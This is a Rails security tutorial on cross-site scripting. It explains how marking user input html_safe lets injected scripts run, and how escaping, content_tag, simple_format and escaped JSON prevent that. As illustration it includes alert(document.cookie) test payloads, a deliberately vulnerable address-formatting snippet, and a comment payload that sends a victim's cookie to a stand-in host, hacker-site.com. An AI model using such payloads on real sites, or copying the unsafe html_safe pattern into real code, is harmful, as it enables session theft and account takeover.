XSS is consistently a top web application security risk according to the Open Web Application Security Project (OWASP).
An XSS vulnerability allows a hacker to inject JavaScript code into a site and have that code executed.
Most web applications have a form. Suppose a user enters <script>alert(document.cookie)</script> in the address field and hits submit. If the user then sees a JavaScript alert, the site has executed the JavaScript code that the user put in. That means the site has an XSS vulnerability.
Almost all modern web applications have some JavaScript code, and the application executes that code. So running JavaScript code is not in itself an issue. The issue is that in this case a hacker is able to put in JavaScript code and then get the application to run it. No one should be allowed to put their own JavaScript code into the application.
If a hacker can execute JavaScript code then the hacker can see another person's cookie. Later we will see how a hacker can do that.
If you are logged into an application then that application sets a cookie. That is how the application knows that you are logged in.
If a hacker can see someone else's cookie then the hacker can log in as that person by using the stolen cookie.
Having SSL does not protect a site from XSS vulnerabilities.
XSS stands for Cross-site scripting. It is a very misleading name because XSS has absolutely nothing to do with cross-site. It has everything to do with a site, any site.
A practical example
It is very common to display an address in a formatted way. Usually the code is something like this.
array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.join('<br />')
When the developer looks at the page in the browser, the <br /> tag is literally shown on the screen instead of producing a line break. The developer looks at the html markup rendered by Rails and finds that each <br /> was sent to the browser as &lt;br /&gt;.
So the developer comes back to the code and marks the string html_safe as shown below.
array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.join('<br />').html_safe
Now the browser renders each <br /> tag as a line break and the address looks nicely formatted.
The developer is happy and the developer moves on.
However, notice that the developer has marked user input data like address1 as html_safe, and that's dangerous.
Hacker in action
The application has a number of users and everything is running smoothly. All the users are seeing properly formatted addresses. And then one day a hacker tries to hack the site. The hacker puts in address1 as <script>alert(document.cookie)</script>.
Now the hacker will see a JavaScript alert showing the cookie.
If we look at the html markup then the html might look like this.
John Smith<br /><script>alert(document.cookie)</script><br />Suite #110<br />Miami<br />FL<br />33027<br />USA
The hacker had put in a <script> tag and the application sent that code to the browser. The browser did its job: it executed the JavaScript code, and in the process the hacker is able to see the cookie.
How would a hacker steal someone else's information?
Let's say that an application has a comment form. In the comment form the hacker puts in the following comment.
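To make the flow above concrete, here is a minimal plain-Ruby sketch of what the application builds. It assumes the same field values as the example and leaves out Rails' html_safe, since that call only marks the string as trusted and does not change the characters sent to the browser.

```ruby
# Field values are taken from the example above; address1 is the hacker's input.
name         = 'John Smith'
address1     = '<script>alert(document.cookie)</script>'
address2     = 'Suite #110'
city_name    = 'Miami'
state_name   = 'FL'
zip          = '33027'
country_name = 'USA'

array  = [name, address1, address2, city_name, state_name, zip, country_name]
markup = array.compact.join('<br />')

puts markup
# The <script> tag survives intact, so a browser would execute it.
puts markup.include?('<script>') # prints true
```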
<script> window.location='http://hacker-site.com?cookie='+document.cookie </script>
The next day another user, Mary, comes to the site and logs in. She is reading the same post, which has a lot of comments, and one of them is the comment posted by the hacker.
The application loads all the comments including the comment posted by the hacker.
When the browser sees JavaScript code, it executes it. And now Mary's cookie information has been sent to hacker-site and Mary is not even aware of it.
This is a classic case of an XSS attack, and this is how the hacker can later log in as Mary just by using her cookie information.
Fixing XSS
Now that we know how a hacker might be able to execute JavaScript code on our application, the question is how we prevent it.
Well, there is only one way to prevent it: do not send a user-supplied <script> tag to the browser. If we send that <script> tag to the browser then the browser will execute the JavaScript.
So what can we do so that the <script> tag is not sent to the browser?
Rails default behavior is to keep things secure
Before we start looking at solutions, let's revisit what happened earlier when we did not mark the content as html_safe. So let's remove html_safe and try to view the content posted by the hacker.
The code without html_safe would look like this.
array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.join('<br />')
And if we execute this code then the hacker's address would look like this in the browser.
John Smith<br /><script>alert(document.cookie)</script><br />Suite #110<br />Miami<br />FL<br />33027<br />USA
Notice that in this case no JavaScript alert was seen. The hacker gets to see the address exactly as the hacker had posted it. Why is that? To answer that, let's look at the html markup.
John Smith&lt;br /&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;br /&gt;Suite #110&lt;br /&gt;Miami&lt;br /&gt;FL&lt;br /&gt;33027&lt;br /&gt;USA
As we can see, Rails did not render the address exactly as it was posted by the hacker. Rails did something because of which <script> turned into &lt;script&gt;.
Rails html-escaped the content by using the html_escape method.
By default Rails assumes that no content is safe, and thus Rails subjects all content to the html_escape method.
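The escaping itself can be tried outside Rails. The sketch below assumes plain Ruby, where ERB::Util.html_escape comes from the standard erb library and returns an ordinary String (Rails builds on the same method but returns a string already marked as safe).

```ruby
require 'erb'

hacker_input = '<script>alert(document.cookie)</script>'

# Angle brackets become entities, so the browser shows text instead of running it.
escaped = ERB::Util.html_escape(hacker_input)
puts escaped
# prints &lt;script&gt;alert(document.cookie)&lt;/script&gt;

# Escaping the whole joined string also escapes our own <br /> separators.
joined = ['John Smith', hacker_input].join('<br />')
escaped_joined = ERB::Util.html_escape(joined)
puts escaped_joined
```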
The problem is that here we are trying to format the content using <br /> and Rails is escaping that also. We need to escape only the user content and not the <br />. Here is how we can do that.
array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.map{ |i| ERB::Util.html_escape(i) }.join('<br />').html_safe
In the above case we are marking the content as html_safe because we passed each piece of user content through html_escape and now we are sure that no unescaped user content can go through.
This will show the address in the browser with proper line breaks, and the hacker's <script> will appear as plain text.
The above solution worked. The <br /> is not escaped and the user input is properly escaped.
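As a rough illustration of the escape-then-join approach, here is a plain-Ruby sketch. The format_address helper name is hypothetical and not part of Rails; in a Rails view the result would additionally be marked html_safe, as in the code above.

```ruby
require 'erb'

# format_address is a hypothetical helper name, not a Rails API.
# Each part is escaped on its own; only our trusted separator is raw html.
def format_address(parts)
  parts.compact.map { |part| ERB::Util.html_escape(part) }.join('<br />')
end

parts = ['John Smith', '<script>alert(document.cookie)</script>', nil, 'Miami']
formatted = format_address(parts)
puts formatted
# prints John Smith<br />&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />Miami
```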
Another solution using content_tag
In the above case we used html_escape and it worked. However, if we need to add, say, a <strong> tag then adding the opening tag and then the closing tag could be quite cumbersome. For such cases we can use content_tag.
By default content_tag escapes the input text.
array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.map{ |i| ActionController::Base.helpers.content_tag(:strong, i) }.join('').html_safe
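To see the shape of the markup this produces without loading Rails, here is a small sketch. The strong_tag method is a hypothetical stand-in that mimics the escape-then-wrap behavior described above; it is not how content_tag is implemented.

```ruby
require 'erb'

# strong_tag is a hypothetical stand-in for content_tag(:strong, text).
# It escapes the text first and then wraps it in trusted markup.
def strong_tag(text)
  "<strong>#{ERB::Util.html_escape(text)}</strong>"
end

items = ['John Smith', '<script>alert(document.cookie)</script>']
html = items.map { |item| strong_tag(item) }.join
puts html
# prints <strong>John Smith</strong><strong>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</strong>
```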
simple_format for simple formatting
If you want to format the text a little bit then you can use simple_format. If a user enters a bunch of text in a text area then simple_format can help make the text look pretty without compromising security. It will strip away <script> and other security-sensitive tags, because simple_format internally uses the sanitize method. Note that simple_format removes the script tag, while solutions like html_escape preserve the script tag in escaped form.
Handling JSON data
We use jbuilder and the view looks like this.
json.user do
  json.name @user.name
  json.address1 @user.address1
  json.address2 @user.address2
  json.city_name @user.city_name
  json.state_name @user.state_name
  json.zip @user.zip
  json.country_name @user.country_name
end
This will produce a JSON structure with a top-level user key that holds the fields above.
On the client side there is JavaScript code to display the content, and $('body').append(data.about) does the job. But when that content is added to the DOM the browser will execute any JavaScript code in it, and now we are back to the same problem.
There are two ways we can handle this problem. The first is to send the data as it is in JSON format. Then it is the responsibility of the client-side JavaScript code to append the data in such a way that html tags like script are not executed.
jQuery provides the text(input) method, which escapes the input value so that any tags in it are displayed as text rather than executed.
In this case the entire responsibility of escaping the content rests on JavaScript. While using the data, the JavaScript code constantly needs to be aware of which content is user input and must be escaped, and which content is not.
That is why we favor the second solution, where the JSON content is escaped to begin with. For escaping the content we can use the h or html_escape helper method.
json.user do
  json.name h(@user.name)
  json.address1 h(@user.address1)
  json.address2 h(@user.address2)
  json.city_name h(@user.city_name)
  json.state_name h(@user.state_name)
  json.zip h(@user.zip)
  json.country_name h(@user.country_name)
end
As you can see the user content is escaped. Now this data can be sent to client side and we do not need to worry about script tag being executed.
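The same idea can be sketched without jbuilder, using only Ruby's standard json and erb libraries. The user hash below is a hypothetical stand-in for the @user record, and only two fields are shown.

```ruby
require 'erb'
require 'json'

# user is a hypothetical plain hash standing in for the @user record.
user = {
  name:     'John Smith',
  address1: '<script>alert(document.cookie)</script>'
}

# Escape every value before it is serialized, as h(...) does in the view.
escaped_user = user.transform_values { |value| ERB::Util.html_escape(value) }
payload = JSON.generate({ user: escaped_user })
puts payload

# The client receives entities instead of a live <script> tag.
puts JSON.parse(payload)['user']['address1']
```

With this approach the client can append the values directly, though it must not escape them a second time or the entities themselves will show up on screen.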